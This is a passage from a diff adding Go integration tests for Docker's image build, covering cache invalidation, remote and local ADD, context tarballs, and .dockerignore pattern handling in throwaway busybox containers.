+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	// Check that adding file with similar name doesn't mess with cache
+	if err := ctx.Add("dir_file", "hello2"); err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name2, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id2 {
+		c.Fatal("The cache should have been used but wasn't")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) {
+	name := "testbuildaddcurrentdirwithcache"
+	name2 := name + "2"
+	name3 := name + "3"
+	name4 := name + "4"
+	dockerfile := `
+        FROM ` + minimalBaseImage() + `
+        MAINTAINER dockerio
+        ADD . /usr/lib/bla`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	// Check that adding file invalidate cache of "ADD ."
+	if err := ctx.Add("bar", "hello2"); err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name2, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 == id2 {
+		c.Fatal("The cache should have been invalided but hasn't.")
+	}
+	// Check that changing file invalidate cache of "ADD ."
+	if err := ctx.Add("foo", "hello1"); err != nil {
+		c.Fatal(err)
+	}
+	id3, err := buildImageFromContext(name3, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id2 == id3 {
+		c.Fatal("The cache should have been invalided but hasn't.")
+	}
+	// Check that changing file to same content with different mtime does not
+	// invalidate cache of "ADD ."
+	time.Sleep(1 * time.Second) // wait second because of mtime precision
+	if err := ctx.Add("foo", "hello1"); err != nil {
+		c.Fatal(err)
+	}
+	id4, err := buildImageFromContext(name4, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id3 != id4 {
+		c.Fatal("The cache should have been used but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddCurrentDirWithoutCache(c *check.C) {
+	name := "testbuildaddcurrentdirwithoutcache"
+	name2 := "testbuildaddcurrentdirwithoutcache2"
+	dockerfile := `
+        FROM ` + minimalBaseImage() + `
+        MAINTAINER dockerio
+        ADD . /usr/lib/bla`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name2, ctx, false)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 == id2 {
+		c.Fatal("The cache should have been invalided but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddRemoteFileWithCache(c *check.C) {
+	name := "testbuildaddremotefilewithcache"
+	server, err := fakeStorage(map[string]string{
+		"baz": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	id1, err := buildImage(name,
+		fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImage(name,
+		fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id2 {
+		c.Fatal("The cache should have been used but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddRemoteFileWithoutCache(c *check.C) {
+	name := "testbuildaddremotefilewithoutcache"
+	name2 := "testbuildaddremotefilewithoutcache2"
+	server, err := fakeStorage(map[string]string{
+		"baz": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	id1, err := buildImage(name,
+		fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImage(name2,
+		fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
+		false)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 == id2 {
+		c.Fatal("The cache should have been invalided but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) {
+	name := "testbuildaddremotefilemtime"
+	name2 := name + "2"
+	name3 := name + "3"
+
+	files := map[string]string{"baz": "hello"}
+	server, err := fakeStorage(files)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD %s/baz /usr/lib/baz/quux`, server.URL()), nil)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	id2, err := buildImageFromContext(name2, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id2 {
+		c.Fatal("The cache should have been used but wasn't - #1")
+	}
+
+	// Now create a different server with same contents (causes different mtime)
+	// The cache should still be used
+
+	// allow some time for clock to pass as mtime precision is only 1s
+	time.Sleep(2 * time.Second)
+
+	server2, err := fakeStorage(files)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server2.Close()
+
+	ctx2, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD %s/baz /usr/lib/baz/quux`, server2.URL()), nil)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx2.Close()
+	id3, err := buildImageFromContext(name3, ctx2, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id3 {
+		c.Fatal("The cache should have been used but wasn't")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithCache(c *check.C) {
+	name := "testbuildaddlocalandremotefilewithcache"
+	server, err := fakeStorage(map[string]string{
+		"baz": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD foo /usr/lib/bla/bar
+        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
+		map[string]string{
+			"foo": "hello world",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id2 {
+		c.Fatal("The cache should have been used but hasn't.")
+	}
+}
+
+func testContextTar(c *check.C, compression archive.Compression) {
+	ctx, err := fakeContext(
+		`FROM busybox
+ADD foo /foo
+CMD ["cat", "/foo"]`,
+		map[string]string{
+			"foo": "bar",
+		},
+	)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	context, err := archive.Tar(ctx.Dir, compression)
+	if err != nil {
+		c.Fatalf("failed to build context tar: %v", err)
+	}
+	name := "contexttar"
+	buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-")
+	buildCmd.Stdin = context
+
+	if out, _, err := runCommandWithOutput(buildCmd); err != nil {
+		c.Fatalf("build failed to complete: %v %v", out, err)
+	}
+}
+
+func (s *DockerSuite) TestBuildContextTarGzip(c *check.C) {
+	testContextTar(c, archive.Gzip)
+}
+
+func (s *DockerSuite) TestBuildContextTarNoCompression(c *check.C) {
+	testContextTar(c, archive.Uncompressed)
+}
+
+func (s *DockerSuite) TestBuildNoContext(c *check.C) {
+	buildCmd := exec.Command(dockerBinary, "build", "-t", "nocontext", "-")
+	buildCmd.Stdin = strings.NewReader(
+		`FROM busybox
+		CMD ["echo", "ok"]`)
+
+	if out, _, err := runCommandWithOutput(buildCmd); err != nil {
+		c.Fatalf("build failed to complete: %v %v", out, err)
+	}
+
+	if out, _ := dockerCmd(c, "run", "--rm", "nocontext"); out != "ok\n" {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, "ok")
+	}
+}
+
+// TODO: TestCaching
+func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithoutCache(c *check.C) {
+	name := "testbuildaddlocalandremotefilewithoutcache"
+	name2 := "testbuildaddlocalandremotefilewithoutcache2"
+	server, err := fakeStorage(map[string]string{
+		"baz": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio
+        ADD foo /usr/lib/bla/bar
+        ADD %s/baz /usr/lib/baz/quux`, server.URL()),
+		map[string]string{
+			"foo": "hello world",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name2, ctx, false)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 == id2 {
+		c.Fatal("The cache should have been invalidated but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildimg"
+
+	_, err := buildImage(name,
+		`FROM busybox:latest
+        RUN mkdir /test && chown daemon:daemon /test && chmod 0600 /test
+        VOLUME /test`,
+		true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "--rm", "testbuildimg", "ls", "-la", "/test")
+
+	if expected := "drw-------"; !strings.Contains(out, expected) {
+		c.Fatalf("expected %s received %s", expected, out)
+	}
+
+	if expected := "daemon   daemon"; !strings.Contains(out, expected) {
+		c.Fatalf("expected %s received %s", expected, out)
+	}
+
+}
+
+// testing #1405 - config.Cmd does not get cleaned up if
+// utilizing cache
+func (s *DockerSuite) TestBuildEntrypointRunCleanup(c *check.C) {
+	name := "testbuildcmdcleanup"
+	if _, err := buildImage(name,
+		`FROM busybox
+        RUN echo "hello"`,
+		true); err != nil {
+		c.Fatal(err)
+	}
+
+	ctx, err := fakeContext(`FROM busybox
+        RUN echo "hello"
+        ADD foo /foo
+        ENTRYPOINT ["/bin/echo"]`,
+		map[string]string{
+			"foo": "hello",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.Cmd")
+	// Cmd must be cleaned up
+	if res != "[]" {
+		c.Fatalf("Cmd %s, expected nil", res)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddFileNotFound(c *check.C) {
+	name := "testbuildaddnotfound"
+	expected := "foo: no such file or directory"
+
+	if daemonPlatform == "windows" {
+		expected = "foo: The system cannot find the file specified"
+	}
+
+	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
+        ADD foo /usr/local/bar`,
+		map[string]string{"bar": "hello"})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		if !strings.Contains(err.Error(), expected) {
+			c.Fatalf("Wrong error %v, must be about missing foo file or directory", err)
+		}
+	} else {
+		c.Fatal("Error must not be nil")
+	}
+}
+
+func (s *DockerSuite) TestBuildInheritance(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildinheritance"
+
+	_, err := buildImage(name,
+		`FROM scratch
+		EXPOSE 2375`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	ports1 := inspectField(c, name, "Config.ExposedPorts")
+
+	_, err = buildImage(name,
+		fmt.Sprintf(`FROM %s
+		ENTRYPOINT ["/bin/echo"]`, name),
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectField(c, name, "Config.Entrypoint")
+	if expected := "[/bin/echo]"; res != expected {
+		c.Fatalf("Entrypoint %s, expected %s", res, expected)
+	}
+	ports2 := inspectField(c, name, "Config.ExposedPorts")
+	if ports1 != ports2 {
+		c.Fatalf("Ports must be same: %s != %s", ports1, ports2)
+	}
+}
+
+func (s *DockerSuite) TestBuildFails(c *check.C) {
+	name := "testbuildfails"
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN sh -c "exit 23"`,
+		true)
+	if err != nil {
+		if !strings.Contains(err.Error(), "returned a non-zero code: 23") {
+			c.Fatalf("Wrong error %v, must be about non-zero code 23", err)
+		}
+	} else {
+		c.Fatal("Error must not be nil")
+	}
+}
+
+func (s *DockerSuite) TestBuildOnBuild(c *check.C) {
+	name := "testbuildonbuild"
+	_, err := buildImage(name,
+		`FROM busybox
+		ONBUILD RUN touch foobar`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	_, err = buildImage(name,
+		fmt.Sprintf(`FROM %s
+		RUN [ -f foobar ]`, name),
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+// gh #2446
+func (s *DockerSuite) TestBuildAddToSymlinkDest(c *check.C) {
+	makeLink := `ln -s /foo /bar`
+	if daemonPlatform == "windows" {
+		makeLink = `mklink /D C:\bar C:\foo`
+	}
+	name := "testbuildaddtosymlinkdest"
+	ctx, err := fakeContext(`FROM busybox
+        RUN sh -c "mkdir /foo"
+        RUN `+makeLink+`
+        ADD foo /bar/
+        RUN sh -c "[ -f /bar/foo ]"
+        RUN sh -c "[ -f /foo/foo ]"`,
+		map[string]string{
+			"foo": "hello",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildEscapeWhitespace(c *check.C) {
+	name := "testbuildescapewhitespace"
+
+	_, err := buildImage(name, `
+  # ESCAPE=\
+  FROM busybox
+  MAINTAINER "Docker \
+IO <io@\
+docker.com>"
+  `, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectField(c, name, "Author")
+
+	if res != "\"Docker IO <io@docker.com>\"" {
+		c.Fatalf("Parsed string did not match the escaped string. Got: %q", res)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) {
+	// Verify that strings that look like ints are still passed as strings
+	name := "testbuildstringing"
+
+	_, err := buildImage(name, `
+  FROM busybox
+  MAINTAINER 123
+  `, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "inspect", name)
+
+	if !strings.Contains(out, "\"123\"") {
+		c.Fatalf("Output does not contain the int as a string:\n%s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildDockerignore(c *check.C) {
+	name := "testbuilddockerignore"
+	dockerfile := `
+        FROM busybox
+        ADD . /bla
+		RUN sh -c "[[ -f /bla/src/x.go ]]"
+		RUN sh -c "[[ -f /bla/Makefile ]]"
+		RUN sh -c "[[ ! -e /bla/src/_vendor ]]"
+		RUN sh -c "[[ ! -e /bla/.gitignore ]]"
+		RUN sh -c "[[ ! -e /bla/README.md ]]"
+		RUN sh -c "[[ ! -e /bla/dir/foo ]]"
+		RUN sh -c "[[ ! -e /bla/foo ]]"
+		RUN sh -c "[[ ! -e /bla/.git ]]"
+		RUN sh -c "[[ ! -e v.cc ]]"
+		RUN sh -c "[[ ! -e src/v.cc ]]"
+		RUN sh -c "[[ ! -e src/_vendor/v.cc ]]"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Makefile":         "all:",
+		".git/HEAD":        "ref: foo",
+		"src/x.go":         "package main",
+		"src/_vendor/v.go": "package main",
+		"src/_vendor/v.cc": "package main",
+		"src/v.cc":         "package main",
+		"v.cc":             "package main",
+		"dir/foo":          "",
+		".gitignore":       "",
+		"README.md":        "readme",
+		".dockerignore": `
+.git
+pkg
+.gitignore
+src/_vendor
+*.md
+**/*.cc
+dir`,
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerignoreCleanPaths(c *check.C) {
+	name := "testbuilddockerignorecleanpaths"
+	dockerfile := `
+        FROM busybox
+        ADD . /tmp/
+        RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo":           "foo",
+		"foo2":          "foo2",
+		"dir1/foo":      "foo in dir1",
+		".dockerignore": "./foo\ndir1//foo\n./dir1/../foo2",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) {
+	name := "testbuilddockerignoreexceptions"
+	dockerfile := `
+        FROM busybox
+        ADD . /bla
+		RUN sh -c "[[ -f /bla/src/x.go ]]"
+		RUN sh -c "[[ -f /bla/Makefile ]]"
+		RUN sh -c "[[ ! -e /bla/src/_vendor ]]"
+		RUN sh -c "[[ ! -e /bla/.gitignore ]]"
+		RUN sh -c "[[ ! -e /bla/README.md ]]"
+		RUN sh -c "[[  -e /bla/dir/dir/foo ]]"
+		RUN sh -c "[[ ! -e /bla/dir/foo1 ]]"
+		RUN sh -c "[[ -f /bla/dir/e ]]"
+		RUN sh -c "[[ -f /bla/dir/e-dir/foo ]]"
+		RUN sh -c "[[ ! -e /bla/foo ]]"
+		RUN sh -c "[[ ! -e /bla/.git ]]"
+		RUN sh -c "[[ -e /bla/dir/a.cc ]]"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Makefile":         "all:",
+		".git/HEAD":        "ref: foo",
+		"src/x.go":         "package main",
+		"src/_vendor/v.go": "package main",
+		"dir/foo":          "",
+		"dir/foo1":         "",
+		"dir/dir/f1":       "",
+		"dir/dir/foo":      "",
+		"dir/e":            "",
+		"dir/e-dir/foo":    "",
+		".gitignore":       "",
+		"README.md":        "readme",
+		"dir/a.cc":         "hello",
+		".dockerignore": `
+.git
+pkg
+.gitignore
+src/_vendor
+*.md
+dir
+!dir/e*
+!dir/dir/foo
+**/*.cc
+!**/*.cc`,
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerignoringDockerfile(c *check.C) {
+	name := "testbuilddockerignoredockerfile"
+	dockerfile := `
+        FROM busybox
+		ADD . /tmp/
+		RUN sh -c "! ls /tmp/Dockerfile"
+		RUN ls /tmp/.dockerignore`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile":    dockerfile,
+		".dockerignore": "Dockerfile\n",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't ignore Dockerfile correctly:%s", err)
+	}
+
+	// now try it with ./Dockerfile
+	ctx.Add(".dockerignore", "./Dockerfile\n")
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't ignore ./Dockerfile correctly:%s", err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildDockerignoringRenamedDockerfile(c *check.C) {
+	name := "testbuilddockerignoredockerfile"
+	dockerfile := `
+        FROM busybox
+		ADD . /tmp/
+		RUN ls /tmp/Dockerfile
+		RUN sh -c "! ls /tmp/MyDockerfile"
+		RUN ls /tmp/.dockerignore`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile":    "Should not use me",
+		"MyDockerfile":  dockerfile,
+		".dockerignore": "MyDockerfile\n",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't ignore MyDockerfile correctly:%s", err)
+	}
+
+	// now try it with ./MyDockerfile
+	ctx.Add(".dockerignore", "./MyDockerfile\n")
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't ignore ./MyDockerfile correctly:%s", err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildDockerignoringDockerignore(c *check.C) {
+	name := "testbuilddockerignoredockerignore"
+	dockerfile := `
+        FROM busybox
+		ADD . /tmp/
+		RUN sh -c "! ls /tmp/.dockerignore"
+		RUN ls /tmp/Dockerfile`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile":    dockerfile,
+		".dockerignore": ".dockerignore\n",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't ignore .dockerignore correctly:%s", err)
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerignoreTouchDockerfile(c *check.C) {
+	var id1 string
+	var id2 string
+
+	name := "testbuilddockerignoretouchdockerfile"
+	dockerfile := `
+        FROM busybox
+		ADD . /tmp/`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile":    dockerfile,
+		".dockerignore": "Dockerfile\n",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if id1, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't build it correctly:%s", err)
+	}
+
+	if id2, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't build it correctly:%s", err)
+	}
+	if id1 != id2 {
+		c.Fatalf("Didn't use the cache - 1")
+	}
+
+	// Now make sure touching Dockerfile doesn't invalidate the cache
+	if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil {
+		c.Fatalf("Didn't add Dockerfile: %s", err)
+	}
+	if id2, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't build it correctly:%s", err)
+	}
+	if id1 != id2 {
+		c.Fatalf("Didn't use the cache - 2")
+	}
+
+	// One more time but just 'touch' it instead of changing the content
+	if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil {
+		c.Fatalf("Didn't add Dockerfile: %s", err)
+	}
+	if id2, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("Didn't build it correctly:%s", err)
+	}
+	if id1 != id2 {
+		c.Fatalf("Didn't use the cache - 3")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildDockerignoringWholeDir(c *check.C) {
+	name := "testbuilddockerignorewholedir"
+	dockerfile := `
+        FROM busybox
+		COPY . /
+		RUN sh -c "[[ ! -e /.gitignore ]]"
+		RUN sh -c "[[ -f /Makefile ]]"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile":    "FROM scratch",
+		"Makefile":      "all:",
+		".gitignore":    "",
+		".dockerignore": ".*\n",
+	})
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+	c.Assert(ctx.Add(".dockerfile", "*"), check.IsNil)
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+	c.Assert(ctx.Add(".dockerfile", "."), check.IsNil)
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+	c.Assert(ctx.Add(".dockerfile", "?"), check.IsNil)
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerignoringBadExclusion(c *check.C) {
+	name := "testbuilddockerignorebadexclusion"
+	dockerfile := `
+        FROM busybox
+		COPY . /
+		RUN sh -c "[[ ! -e /.gitignore ]]"
+		RUN sh -c "[[ -f /Makefile ]]"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile":    "FROM scratch",
+		"Makefile":      "all:",
+		".gitignore":    "",
+		".dockerignore": "!\n",
+	})
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+	if _, err = buildImageFromContext(name, ctx, true); err == nil {
+		c.Fatalf("Build was supposed to fail but didn't")
+	}
+
+	if err.Error() != "failed to build the image: Error checking context: 'Illegal exclusion pattern: !'.\n" {
+		c.Fatalf("Incorrect output, got:%q", err.Error())
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerignoringWildTopDir(c *check.C) {
+	dockerfile := `
+        FROM busybox
+		COPY . /
+		RUN sh -c "[[ ! -e /.dockerignore ]]"
+		RUN sh -c "[[ ! -e /Dockerfile ]]"
+		RUN sh -c "[[ ! -e /file1 ]]"
+		RUN sh -c "[[ ! -e /dir ]]"`
+
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile": "FROM scratch",
+		"file1":      "",
+		"dir/dfile1": "",
+	})
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+
+	// All of these should result in ignoring all files
+	for _, variant := range []string{"**", "**/", "**/**", "*"} {
+		ctx.Add(".dockerignore", variant)
+		_, err = buildImageFromContext("noname", ctx, true)
+		c.Assert(err, check.IsNil, check.Commentf("variant: %s", variant))
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerignoringWildDirs(c *check.C) {
+	dockerfile := `
+        FROM busybox
+		COPY . /
+		#RUN sh -c "[[ -e /.dockerignore ]]"
+		RUN sh -c "[[ -e /Dockerfile ]]           && \
+		           [[ ! -e /file0 ]]              && \
+		           [[ ! -e /dir1/file0 ]]         && \
+		           [[ ! -e /dir2/file0 ]]         && \
+		           [[ ! -e /file1 ]]              && \
+		           [[ ! -e /dir1/file1 ]]         && \
+		           [[ ! -e /dir1/dir2/file1 ]]    && \
+		           [[ ! -e /dir1/file2 ]]         && \
+		           [[   -e /dir1/dir2/file2 ]]    && \
+		           [[ ! -e /dir1/dir2/file4 ]]    && \
+		           [[ ! -e /dir1/dir2/file5 ]]    && \
+		           [[ ! -e /dir1/dir2/file6 ]]    && \
+		           [[ ! -e /dir1/dir3/file7 ]]    && \
+		           [[ ! -e /dir1/dir3/file8 ]]    && \
+		           [[   -e /dir1/dir3 ]]          && \
+		           [[   -e /dir1/dir4 ]]          && \
+		           [[ ! -e 'dir1/dir5/fileAA' ]]  && \
+		           [[   -e 'dir1/dir5/fileAB' ]]  && \
+		           [[   -e 'dir1/dir5/fileB' ]]"   # "." in pattern means nothing
+
+		RUN echo all done!`
+
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile":      "FROM scratch",
+		"file0":           "",
+		"dir1/file0":      "",
+		"dir1/dir2/file0": "",
+
+		"file1":           "",
+		"dir1/file1":      "",
+		"dir1/dir2/file1": "",
+
+		"dir1/file2":      "",
+		"dir1/dir2/file2": "", // remains
+
+		"dir1/dir2/file4": "",
+		"dir1/dir2/file5": "",
+		"dir1/dir2/file6": "",
+		"dir1/dir3/file7": "",
+		"dir1/dir3/file8": "",
+		"dir1/dir4/file9": "",
+
+		"dir1/dir5/fileAA": "",
+		"dir1/dir5/fileAB": "",
+		"dir1/dir5/fileB":  "",
+
+		".dockerignore": `
+**/file0
+**/*file1
+**/dir1/file2
+dir1/**/file4
+**/dir2/file5
+**/dir1/dir2/file6
+dir1/dir3/**
+**/dir4/**
+**/file?A
+**/file\?B
+**/dir5/file.
+`,
+	})
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+
+	_, err = buildImageFromContext("noname", ctx, true)
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestBuildLineBreak(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildlinebreak"
+	_, err := buildImage(name,
+		`FROM  busybox
+RUN    sh -c 'echo root:testpass \
+	> /tmp/passwd'
+RUN    mkdir -p /var/run/sshd
+RUN    sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]"
+RUN    sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildEOLInLine(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildeolinline"
+	_, err := buildImage(name,
+		`FROM   busybox
+RUN    sh -c 'echo root:testpass > /tmp/passwd'
+RUN    echo "foo \n bar"; echo "baz"
+RUN    mkdir -p /var/run/sshd
+RUN    sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]"
+RUN    sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCommentsShebangs(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildcomments"
+	_, err := buildImage(name,
+		`FROM busybox
+# This is an ordinary comment.
+RUN { echo '#!/bin/sh'; echo 'echo hello world'; } > /hello.sh
+RUN [ ! -x /hello.sh ]
+# comment with line break \
+RUN chmod +x /hello.sh
+RUN [ -x /hello.sh ]
+RUN [ "$(cat /hello.sh)" = $'#!/bin/sh\necho hello world' ]
+RUN [ "$(/hello.sh)" = "hello world" ]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildUsersAndGroups(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildusers"
+	_, err := buildImage(name,
+		`FROM busybox
+
+# Make sure our defaults work
